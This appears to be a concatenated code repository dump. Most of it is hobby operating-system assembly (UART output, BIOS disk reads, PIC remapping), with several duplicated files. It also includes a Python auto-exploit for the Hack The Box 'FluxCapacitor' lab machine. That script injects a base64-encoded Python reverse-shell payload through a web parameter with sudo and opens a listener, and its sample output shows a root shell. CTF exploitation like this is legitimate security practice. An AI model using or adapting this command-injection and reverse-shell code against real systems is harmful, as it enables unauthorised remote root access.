15 | /*---Code---------------------------------------------------------------------*/
16 | .section ".text"
17 | .global uart_puts
18 | uart_puts:
19 | /******************************************************************************/
20 | /* Sends a string to UART (PL011). */
21 | /******************************************************************************/
22 | /* x20: The address of the string */
23 | /******************************************************************************/
24 | stp lr, xzr, [sp, #-16]! // Store Link Register (has the return address)
25 | stp x21, x22, [sp, #-16]! // Store registers that will be used
26 | ldrh w21, [x20], #2 // Load length into w21 (needs 2-byte alignment!)
27 | 1: ldrb w22, [x20], #1 // Load a byte into w22 (then increase x20 by 1)
28 | bl uart_putc // Call uart_putc (Link Register will be written)
29 | subs w21, w21, #1 // Decrease string length counter
30 | bne 1b // Loop until string length counter = 0
31 | ldp x21, x22, [sp], #16 // Restore used registers
32 | ldp lr, xzr, [sp], #16 // Restore Link Register (has the return address)
33 | ret
34 |
35 |
36 | .global uart_putc
37 | uart_putc:
38 | /******************************************************************************/
39 | /* Waits for UART (PL011) to be ready, then writes one character. */
40 | /******************************************************************************/
41 | /* w22: The character (byte) to print. */
42 | /******************************************************************************/
43 | stp x23, x24, [sp, #-16]! // Store registers that will be used
44 | ldr x23, =UART0_FR // Load UART Flag Register address into register x23.
45 | 1: ldr w24, [x23] // Read Flag Register value into register w24.
46 | tst w24, #TXFF_BIT // Test if "Transmit FIFO Full" bit is set.
47 | bne 1b // If bit is set (UART is not ready), loop.
48 | ldr x23, =UART0_DR // Load UART Data Register address into register x23.
49 | strb w22, [x23] // Send our character byte to the Data Register
50 | ldp x23, x24, [sp], #16 // Restore used registers
51 | ret
52 |
--------------------------------------------------------------------------------
/os/part1/stage1/disk.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 | disk db 0x80
5 |
6 | disk_error_message dw 11
7 | db 'Disk error!'
8 |
9 | DAP:
10 | ;*******************************************************************************;
11 | ; Disk Address Packet ;
12 | ;-------------------------------------------------------------------------------;
13 | ; Offset Size Description ;
14 | ; 0 1 size of packet (16 bytes) ;
15 | ; 1 1 always 0 ;
16 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ;
17 | ; 4 2 16-bit offset of target buffer ;
18 | ; 4 2 16-bit segment of target buffer ;
19 | ; 8 4 lower 32 bits of 48-bit starting LBA ;
20 | ; 12 4 upper 32 bits of 48-bit starting LBA ;
21 | ;*******************************************************************************;
22 | db 0x10 ; size of packet = 16 bytes
23 | db 0 ; always 0
24 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS)
25 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer
26 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer
27 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA
28 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA
29 |
30 | ;---Code------------------------------------------------------------------------
31 | Real_mode_read_disk:
32 | ;**********************************************************;
33 | ; Load disk sectors to memory (int 13h, function code 42h) ;
34 | ;----------------------------------------------------------;
35 | ; ax: start sector ;
36 | ; cx: number of sectors (512 bytes) to read ;
37 | ; bx: offset of buffer ;
38 | ; dx: segment of buffer ;
39 | ;**********************************************************;
40 | .start:
41 | cmp cx, 127 ; (max sectors to read in one call = 127)
42 | jbe .good_size
43 | pusha
44 | mov cx, 127
45 | call Real_mode_read_disk
46 | popa
47 | add eax, 127
48 | add dx, 127 * 512 / 16
49 | sub cx, 127
50 | jmp .start
51 |
52 | .good_size:
53 | mov [DAP.LBA_lower], ax
54 | mov [DAP.num_sectors], cx
55 | mov [DAP.buf_segment], dx
56 | mov [DAP.buf_offset], bx
57 | mov dl, [disk]
58 | mov si, DAP
59 | mov ah, 0x42
60 | int 0x13
61 | jc .print_error
62 | ret
63 | .print_error:
64 | mov si, disk_error_message
65 | call Real_mode_println
66 | .halt: hlt
67 | jmp .halt ; Infinite loop. We cannot recover from disk error.
68 |
--------------------------------------------------------------------------------
/os/part2/stage2/pic.asm:
--------------------------------------------------------------------------------
1 | ; PIC (Programmable Interrupt Controller)
2 |
3 | BITS 16
4 |
5 | ;---Constants----------------------------------------------------------------------
6 | PIC1_COMMAND equ 0x20 ; Command port of 1st PIC
7 | PIC1_DATA equ 0x21 ; Data port of 1st PIC
8 | PIC2_COMMAND equ 0xA0 ; Command port of 2nd PIC
9 | PIC2_DATA equ 0xA1 ; Data port of 2nd PIC
10 | PIC_EOI equ 0x20 ; EOI (End of interrupt) command (= 0x20)
11 |
12 | ICW1_ICW4 equ 0x01 ; Initialization Command Word 4 is needed
13 | ICW1_SINGLE equ 0x02 ; Single mode (0: Cascade mode)
14 | ICW1_INTERVAL4 equ 0x04 ; Call address interval: 4 (0: 8)
15 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode)
16 | ICW1_INIT equ 0x10 ; Initialization - required!
17 |
18 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode)
19 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI)
20 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave
21 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master
22 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode
23 |
24 |
25 | ;---Code---------------------------------------------------------------------------
26 | Remap_PIC:
27 | ;***************************************************************************;
28 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ;
29 | ; (which are reserved up until 0x1F). It is thus recommended to change the ;
30 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ;
31 | ; A common choice is to move them to the beginning of the available range: ;
32 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ;
33 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ;
34 | ;***************************************************************************;
35 | push ax
36 |
37 | ; Disable IRQs
38 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs.
39 | out PIC1_DATA, al
40 | out PIC2_DATA, al
41 | nop
42 | nop
43 |
44 | ; Remap PIC
45 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs
46 | out PIC1_COMMAND, al
47 | out PIC2_COMMAND, al
48 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32)
49 | out PIC1_DATA, al
50 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. IRQ8 => INT 40)
51 | out PIC2_DATA, al
52 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100)
53 | out PIC1_DATA, al
54 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010)
55 | out PIC2_DATA, al
56 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode
57 | out PIC1_DATA, al
58 | out PIC2_DATA, al
59 |
60 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel)
61 | out PIC1_DATA, al
62 | out PIC2_DATA, al
63 |
64 | pop ax
65 | ret
66 |
--------------------------------------------------------------------------------
/os/part3/stage2/pic.asm:
--------------------------------------------------------------------------------
1 | ; PIC (Programmable Interrupt Controller)
2 |
3 | BITS 16
4 |
5 | ;---Constants----------------------------------------------------------------------
6 | PIC1_COMMAND equ 0x20 ; Command port of 1st PIC
7 | PIC1_DATA equ 0x21 ; Data port of 1st PIC
8 | PIC2_COMMAND equ 0xA0 ; Command port of 2nd PIC
9 | PIC2_DATA equ 0xA1 ; Data port of 2nd PIC
10 | PIC_EOI equ 0x20 ; EOI (End of interrupt) command (= 0x20)
11 |
12 | ICW1_ICW4 equ 0x01 ; Initialization Command Word 4 is needed
13 | ICW1_SINGLE equ 0x02 ; Single mode (0: Cascade mode)
14 | ICW1_INTERVAL4 equ 0x04 ; Call address interval: 4 (0: 8)
15 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode)
16 | ICW1_INIT equ 0x10 ; Initialization - required!
17 |
18 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode)
19 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI)
20 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave
21 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master
22 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode
23 |
24 |
25 | ;---Code---------------------------------------------------------------------------
26 | Remap_PIC:
27 | ;***************************************************************************;
28 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ;
29 | ; (which are reserved up until 0x1F). It is thus recommended to change the ;
30 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ;
31 | ; A common choice is to move them to the beginning of the available range: ;
32 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ;
33 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ;
34 | ;***************************************************************************;
35 | push ax
36 |
37 | ; Disable IRQs
38 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs.
39 | out PIC1_DATA, al
40 | out PIC2_DATA, al
41 | nop
42 | nop
43 |
44 | ; Remap PIC
45 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs
46 | out PIC1_COMMAND, al
47 | out PIC2_COMMAND, al
48 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32)
49 | out PIC1_DATA, al
50 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. IRQ8 => INT 40)
51 | out PIC2_DATA, al
52 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100)
53 | out PIC1_DATA, al
54 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010)
55 | out PIC2_DATA, al
56 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode
57 | out PIC1_DATA, al
58 | out PIC2_DATA, al
59 |
60 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel)
61 | out PIC1_DATA, al
62 | out PIC2_DATA, al
63 |
64 | pop ax
65 | ret
66 |
--------------------------------------------------------------------------------
/os/part4/stage2/pic.asm:
--------------------------------------------------------------------------------
1 | ; PIC (Programmable Interrupt Controller)
2 |
3 | BITS 16
4 |
5 | ;---Constants----------------------------------------------------------------------
6 | PIC1_COMMAND equ 0x20 ; Command port of 1st PIC
7 | PIC1_DATA equ 0x21 ; Data port of 1st PIC
8 | PIC2_COMMAND equ 0xA0 ; Command port of 2nd PIC
9 | PIC2_DATA equ 0xA1 ; Data port of 2nd PIC
10 | PIC_EOI equ 0x20 ; EOI (End of interrupt) command (= 0x20)
11 |
12 | ICW1_ICW4 equ 0x01 ; Initialization Command Word 4 is needed
13 | ICW1_SINGLE equ 0x02 ; Single mode (0: Cascade mode)
14 | ICW1_INTERVAL4 equ 0x04 ; Call address interval: 4 (0: 8)
15 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode)
16 | ICW1_INIT equ 0x10 ; Initialization - required!
17 |
18 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode)
19 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI)
20 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave
21 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master
22 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode
23 |
24 |
25 | ;---Code---------------------------------------------------------------------------
26 | Remap_PIC:
27 | ;***************************************************************************;
28 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ;
29 | ; (which are reserved up until 0x1F). It is thus recommended to change the ;
30 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ;
31 | ; A common choice is to move them to the beginning of the available range: ;
32 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ;
33 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ;
34 | ;***************************************************************************;
35 | push ax
36 |
37 | ; Disable IRQs
38 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs.
39 | out PIC1_DATA, al
40 | out PIC2_DATA, al
41 | nop
42 | nop
43 |
44 | ; Remap PIC
45 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs
46 | out PIC1_COMMAND, al
47 | out PIC2_COMMAND, al
48 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32)
49 | out PIC1_DATA, al
50 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. IRQ8 => INT 40)
51 | out PIC2_DATA, al
52 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100)
53 | out PIC1_DATA, al
54 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010)
55 | out PIC2_DATA, al
56 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode
57 | out PIC1_DATA, al
58 | out PIC2_DATA, al
59 |
60 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel)
61 | out PIC1_DATA, al
62 | out PIC2_DATA, al
63 |
64 | pop ax
65 | ret
66 |
--------------------------------------------------------------------------------
/os/part5/stage2/pic.asm:
--------------------------------------------------------------------------------
1 | ; PIC (Programmable Interrupt Controller)
2 | ; Author: Alamot
3 |
4 | BITS 16
5 |
6 | ;---Constants----------------------------------------------------------------------
7 | PIC1_COMMAND equ 0x20 ; Command port of 1st PIC
8 | PIC1_DATA equ 0x21 ; Data port of 1st PIC
9 | PIC2_COMMAND equ 0xA0 ; Command port of 2nd PIC
10 | PIC2_DATA equ 0xA1 ; Data port of 2nd PIC
11 | PIC_EOI equ 0x20 ; EOI (End of interrupt) command (= 0x20)
12 |
13 | ICW1_ICW4 equ 0x01 ; Initialization Command Word 4 is needed
14 | ICW1_SINGLE equ 0x02 ; Single mode (0: Cascade mode)
15 | ICW1_INTERVAL4 equ 0x04 ; Call address interval: 4 (0: 8)
16 | ICW1_LEVEL equ 0x08 ; Level triggered mode (0: Edge mode)
17 | ICW1_INIT equ 0x10 ; Initialization - required!
18 |
19 | ICW4_8086 equ 0x01 ; 8086/88 mode (0: MCS-80/85 mode)
20 | ICW4_AUTO_EOI equ 0x02 ; Auto End Of Interrupt (0: Normal EOI)
21 | ICW4_BUF_SLAVE equ 0x08 ; Buffered mode/slave
22 | ICW4_BUF_MASTER equ 0x0C ; Buffered mode/master
23 | ICW4_SFNM equ 0x10 ; Special Fully Nested Mode
24 |
25 |
26 | ;---Code---------------------------------------------------------------------------
27 | Remap_PIC:
28 | ;***************************************************************************;
29 | ; In protected / long mode, the IRQs 0-15 conflict with the CPU exceptions ;
30 | ; (which are reserved up until 0x1F). It is thus recommended to change the ;
31 | ; PIC's offsets (remapping the PIC) so that IRQs use non-reserved vectors. ;
32 | ; A common choice is to move them to the beginning of the available range: ;
33 | ; IRQs 0..15 -> INT 0x20..0x2F (30..47). For that, we need to set the 1st ;
34 | ; PIC's offset to 0x20 (32) and the 2nd's to 0x28 (40). ;
35 | ;***************************************************************************;
36 | push ax
37 |
38 | ; Disable IRQs
39 | mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to mask/disable all IRQs.
40 | out PIC1_DATA, al
41 | out PIC2_DATA, al
42 | nop
43 | nop
44 |
45 | ; Remap PIC
46 | mov al, ICW1_INIT | ICW1_ICW4 ; ICW1: Send initialization command (= 0x11) to both PICs
47 | out PIC1_COMMAND, al
48 | out PIC2_COMMAND, al
49 | mov al, 0x20 ; ICW2: Set vector offset of 1st PIC to 0x20 (i.e. IRQ0 => INT 32)
50 | out PIC1_DATA, al
51 | mov al, 0x28 ; ICW2: Set vector offset of 2nd PIC to 0x28 (i.e. IRQ8 => INT 40)
52 | out PIC2_DATA, al
53 | mov al, 4 ; ICW3: tell 1st PIC that there is a 2nd PIC at IRQ2 (= 00000100)
54 | out PIC1_DATA, al
55 | mov al, 2 ; ICW3: tell 2nd PIC its "cascade" identity (= 00000010)
56 | out PIC2_DATA, al
57 | mov al, ICW4_8086 ; ICW4: Set mode to 8086/88 mode
58 | out PIC1_DATA, al
59 | out PIC2_DATA, al
60 |
61 | mov al, 0xFF ; OCW1: We mask all interrupts (until we set a proper IDT in Kernel)
62 | out PIC1_DATA, al
63 | out PIC2_DATA, al
64 |
65 | pop ax
66 | ret
67 |
--------------------------------------------------------------------------------
/hacking/HTB/FluxCapacitor/autopwn_flux.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | import base64
3 | import signal, thread
4 | import requests, urllib
5 | from pwn import *
6 | signal.signal(signal.SIGINT, signal.SIG_DFL)
7 |
8 | LHOST="10.10.14.43"
9 | LPORT=60001
10 | RHOST="10.10.10.69"
11 | RPORT=80
12 |
13 | PAYLOAD = "/usr/bin/python3 -c \"import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('"+str(LHOST)+"',"+str(LPORT)+"));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn(['/bin/bash','-i']);s.close();exit();\""
14 |
15 | class NoEncodingSession(requests.Session):
16 | def send(self, *a, **kw):
17 | # a[0] is prepared request
18 | a[0].url = urllib.unquote(a[0].url)
19 | return requests.Session.send(self, *a, **kw)
20 |
21 | def send_shell_payload():
22 | encoded_payload = "\\".join(base64.b64encode(PAYLOAD))
23 | log.info("http://"+str(RHOST)+":"+str(RPORT)+"/sync?opt=' sudo /home/themiddle/.monit cmd "+encoded_payload+"'")
24 | try:
25 | log.info("I am sending the encoded payload for you...")
26 | client = NoEncodingSession()
27 | client.keep_alive = False
28 | url = "http://"+str(RHOST)+":"+str(RPORT)+"/sync"
29 | response = client.get(url, params="opt=' sudo /home/themiddle/.monit cmd "+encoded_payload+"'")
30 | print("STATUS CODE: "+str(response.status_code))
31 | print(response.text)
32 | except requests.exceptions.RequestException as e:
33 | log.failure(str(e))
34 | finally:
35 | if client:
36 | client.close()
37 |
38 | try:
39 | threading.Thread(target=send_shell_payload).start()
40 | except Exception as e:
41 | log.error(str(e))
42 | shell = listen(LPORT, timeout=10).wait_for_connection()
43 | if shell.sock is None:
44 | log.failure("Connection timeout.")
45 | sys.exit()
46 | shell.interactive()
47 | sys.exit()
48 |
49 | '''
50 | $ python2 autopwn_flux.py
51 | [*] http://10.10.10.69:80/sync?opt=' sudo /home/themiddle/.monit cmd L\3\V\z\c\i\9\i\a\W\4\v\c\H\l\0\a\G\9\u\M\y\A\t\Y\y\A\i\a\W\1\w\b\3\J\0\I\G\9\z\L\H\B\0\e\S\x\z\b\2\N\r\Z\X\Q\7\c\z\1\z\b\2\N\r\Z\X\Q\u\c\2\9\j\a\2\V\0\K\H\N\v\Y\2\t\l\d\C\5\B\R\l\9\J\T\k\V\U\L\H\N\v\Y\2\t\l\d\C\5\T\T\0\N\L\X\1\N\U\U\k\V\B\T\S\k\7\c\y\5\j\b\2\5\u\Z\W\N\0\K\C\g\n\M\T\A\u\M\T\A\u\M\T\Q\u\N\D\M\n\L\D\Y\w\M\D\A\x\K\S\k\7\b\3\M\u\Z\H\V\w\M\i\h\z\L\m\Z\p\b\G\V\u\b\y\g\p\L\D\A\p\O\2\9\z\L\m\R\1\c\D\I\o\c\y\5\m\a\W\x\l\b\m\8\o\K\S\w\x\K\T\t\v\c\y\5\k\d\X\A\y\K\H\M\u\Z\m\l\s\Z\W\5\v\K\C\k\s\M\i\k\7\b\3\M\u\c\H\V\0\Z\W\5\2\K\C\d\I\S\V\N\U\R\k\l\M\R\S\c\s\J\y\9\k\Z\X\Y\v\b\n\V\s\b\C\c\p\O\3\B\0\e\S\5\z\c\G\F\3\b\i\h\b\J\y\9\i\a\W\4\v\Y\m\F\z\a\C\c\s\J\y\1\p\J\1\0\p\O\3\M\u\Y\2\x\v\c\2\U\o\K\T\t\l\e\G\l\0\K\C\k\7\I\g\=\='
52 | [+] Trying to bind to 0.0.0.0 on port 60001: Done
53 | [*] I am sending the encoded payload for you...
54 | [+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.69 on port 49114
55 | [*] Switching to interactive mode
56 | root@fluxcapacitor:/# $ whoami
57 | whoami
58 | root
59 | root@fluxcapacitor:/# $
60 | '''
61 |
--------------------------------------------------------------------------------
/os/part2/stage1/disk.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | disk db 0x80
6 |
7 | disk_error_message dw 11
8 | db 'Disk error!'
9 |
10 |
11 | DAP:
12 | ;*******************************************************************************;
13 | ; Disk Address Packet ;
14 | ;-------------------------------------------------------------------------------;
15 | ; Offset Size Description ;
16 | ; 0 1 size of packet (16 bytes) ;
17 | ; 1 1 always 0 ;
18 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ;
19 | ; 4 2 16-bit offset of target buffer ;
20 | ; 4 2 16-bit segment of target buffer ;
21 | ; 8 4 lower 32 bits of 48-bit starting LBA ;
22 | ; 12 4 upper 32 bits of 48-bit starting LBA ;
23 | ;*******************************************************************************;
24 | db 0x10 ; size of packet = 16 bytes
25 | db 0 ; always 0
26 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS)
27 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer
28 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer
29 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA
30 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA
31 |
32 |
33 |
34 | ;---Code------------------------------------------------------------------------
35 |
36 | Real_mode_read_disk:
37 | ;**********************************************************;
38 | ; Load disk sectors to memory (int 13h, function code 42h) ;
39 | ;----------------------------------------------------------;
40 | ; ax: start sector ;
41 | ; cx: number of sectors (512 bytes) to read ;
42 | ; bx: offset of buffer ;
43 | ; dx: segment of buffer ;
44 | ;**********************************************************;
45 | .start:
46 | cmp cx, 127 ; (max sectors to read in one call = 127)
47 | jbe .good_size
48 | pusha
49 | mov cx, 127
50 | call Real_mode_read_disk
51 | popa
52 | add eax, 127
53 | add dx, 127 * 512 / 16
54 | sub cx, 127
55 | jmp .start
56 |
57 | .good_size:
58 | mov [DAP.LBA_lower], ax
59 | mov [DAP.num_sectors], cx
60 | mov [DAP.buf_segment], dx
61 | mov [DAP.buf_offset], bx
62 | mov dl, [disk]
63 | mov si, DAP
64 | mov ah, 0x42
65 | int 0x13
66 | jc .print_error
67 | ret
68 | .print_error:
69 | mov si, disk_error_message
70 | call Real_mode_println
71 | .halt: hlt
72 | jmp .halt; Infinite loop. We cannot recover from disk error.
73 |
--------------------------------------------------------------------------------
/os/part3/stage1/disk.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | disk db 0x80
6 |
7 | disk_error_message dw 11
8 | db 'Disk error!'
9 |
10 |
11 | DAP:
12 | ;*******************************************************************************;
13 | ; Disk Address Packet ;
14 | ;-------------------------------------------------------------------------------;
15 | ; Offset Size Description ;
16 | ; 0 1 size of packet (16 bytes) ;
17 | ; 1 1 always 0 ;
18 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ;
19 | ; 4 2 16-bit offset of target buffer ;
20 | ; 4 2 16-bit segment of target buffer ;
21 | ; 8 4 lower 32 bits of 48-bit starting LBA ;
22 | ; 12 4 upper 32 bits of 48-bit starting LBA ;
23 | ;*******************************************************************************;
24 | db 0x10 ; size of packet = 16 bytes
25 | db 0 ; always 0
26 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS)
27 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer
28 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer
29 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA
30 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA
31 |
32 |
33 |
34 | ;---Code------------------------------------------------------------------------
35 |
36 | Real_mode_read_disk:
37 | ;**********************************************************;
38 | ; Load disk sectors to memory (int 13h, function code 42h) ;
39 | ;----------------------------------------------------------;
40 | ; ax: start sector ;
41 | ; cx: number of sectors (512 bytes) to read ;
42 | ; bx: offset of buffer ;
43 | ; dx: segment of buffer ;
44 | ;**********************************************************;
45 | .start:
46 | cmp cx, 127 ; (max sectors to read in one call = 127)
47 | jbe .good_size
48 | pusha
49 | mov cx, 127
50 | call Real_mode_read_disk
51 | popa
52 | add eax, 127
53 | add dx, 127 * 512 / 16
54 | sub cx, 127
55 | jmp .start
56 |
57 | .good_size:
58 | mov [DAP.LBA_lower], ax
59 | mov [DAP.num_sectors], cx
60 | mov [DAP.buf_segment], dx
61 | mov [DAP.buf_offset], bx
62 | mov dl, [disk]
63 | mov si, DAP
64 | mov ah, 0x42
65 | int 0x13
66 | jc .print_error
67 | ret
68 | .print_error:
69 | mov si, disk_error_message
70 | call Real_mode_println
71 | .halt: hlt
72 | jmp .halt; Infinite loop. We cannot recover from disk error.
73 |
--------------------------------------------------------------------------------
/os/part4/stage1/disk.asm:
--------------------------------------------------------------------------------
1 | BITS 16
2 |
3 | ;---Initialized data------------------------------------------------------------
4 |
5 | disk db 0x80
6 |
7 | disk_error_message dw 11
8 | db 'Disk error!'
9 |
10 |
11 | DAP:
12 | ;*******************************************************************************;
13 | ; Disk Address Packet ;
14 | ;-------------------------------------------------------------------------------;
15 | ; Offset Size Description ;
16 | ; 0 1 size of packet (16 bytes) ;
17 | ; 1 1 always 0 ;
18 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ;
19 | ; 4 2 16-bit offset of target buffer ;
20 | ; 4 2 16-bit segment of target buffer ;
21 | ; 8 4 lower 32 bits of 48-bit starting LBA ;
22 | ; 12 4 upper 32 bits of 48-bit starting LBA ;
23 | ;*******************************************************************************;
24 | db 0x10 ; size of packet = 16 bytes
25 | db 0 ; always 0
26 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS)
27 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer
28 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer
29 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA
30 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA
31 |
32 |
33 |
34 | ;---Code------------------------------------------------------------------------
35 |
36 | Real_mode_read_disk:
37 | ;**********************************************************;
38 | ; Load disk sectors to memory (int 13h, function code 42h) ;
39 | ;----------------------------------------------------------;
40 | ; ax: start sector ;
41 | ; cx: number of sectors (512 bytes) to read ;
42 | ; bx: offset of buffer ;
43 | ; dx: segment of buffer ;
44 | ;**********************************************************;
45 | .start:
46 | cmp cx, 127 ; (max sectors to read in one call = 127)
47 | jbe .good_size
48 | pusha
49 | mov cx, 127
50 | call Real_mode_read_disk
51 | popa
52 | add eax, 127
53 | add dx, 127 * 512 / 16
54 | sub cx, 127
55 | jmp .start
56 |
57 | .good_size:
58 | mov [DAP.LBA_lower], ax
59 | mov [DAP.num_sectors], cx
60 | mov [DAP.buf_segment], dx
61 | mov [DAP.buf_offset], bx
62 | mov dl, [disk]
63 | mov si, DAP
64 | mov ah, 0x42
65 | int 0x13
66 | jc .print_error
67 | ret
68 | .print_error:
69 | mov si, disk_error_message
70 | call Real_mode_println
71 | .halt: hlt
72 | jmp .halt; Infinite loop. We cannot recover from disk error.
73 |
--------------------------------------------------------------------------------
/os/part5/stage1/disk.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 16
4 |
5 | ;---Initialized data------------------------------------------------------------
6 |
7 | disk db 0x80
8 |
9 | disk_error_message dw 11
10 | db 'Disk error!'
11 |
12 |
13 | DAP:
14 | ;*******************************************************************************;
15 | ; Disk Address Packet ;
16 | ;-------------------------------------------------------------------------------;
17 | ; Offset Size Description ;
18 | ; 0 1 size of packet (16 bytes) ;
19 | ; 1 1 always 0 ;
20 | ; 2 2 number of sectors to load (max = 127 on some BIOS) ;
21 | ; 4 2 16-bit offset of target buffer ;
22 | ; 4 2 16-bit segment of target buffer ;
23 | ; 8 4 lower 32 bits of 48-bit starting LBA ;
24 | ; 12 4 upper 32 bits of 48-bit starting LBA ;
25 | ;*******************************************************************************;
26 | db 0x10 ; size of packet = 16 bytes
27 | db 0 ; always 0
28 | .num_sectors: dw 127 ; number of sectors to load (max = 127 on some BIOS)
29 | .buf_offset: dw 0x0 ; 16-bit offset of target buffer
30 | .buf_segment: dw 0x0 ; 16-bit segment of target buffer
31 | .LBA_lower: dd 0x0 ; lower 32 bits of 48-bit starting LBA
32 | .LBA_upper: dd 0x0 ; upper 32 bits of 48-bit starting LBA
33 |
34 |
35 |
36 | ;---Code------------------------------------------------------------------------
37 |
38 | Real_mode_read_disk:
39 | ;**********************************************************;
40 | ; Load disk sectors to memory (int 13h, function code 42h) ;
41 | ;----------------------------------------------------------;
42 | ; ax: start sector ;
43 | ; cx: number of sectors (512 bytes) to read ;
44 | ; bx: offset of buffer ;
45 | ; dx: segment of buffer ;
46 | ;**********************************************************;
47 | .start:
48 | cmp cx, 127 ; (max sectors to read in one call = 127)
49 | jbe .good_size
50 | pusha
51 | mov cx, 127
52 | call Real_mode_read_disk
53 | popa
54 | add eax, 127
55 | add dx, 127 * 512 / 16
56 | sub cx, 127
57 | jmp .start
58 |
59 | .good_size:
60 | mov [DAP.LBA_lower], ax
61 | mov [DAP.num_sectors], cx
62 | mov [DAP.buf_segment], dx
63 | mov [DAP.buf_offset], bx
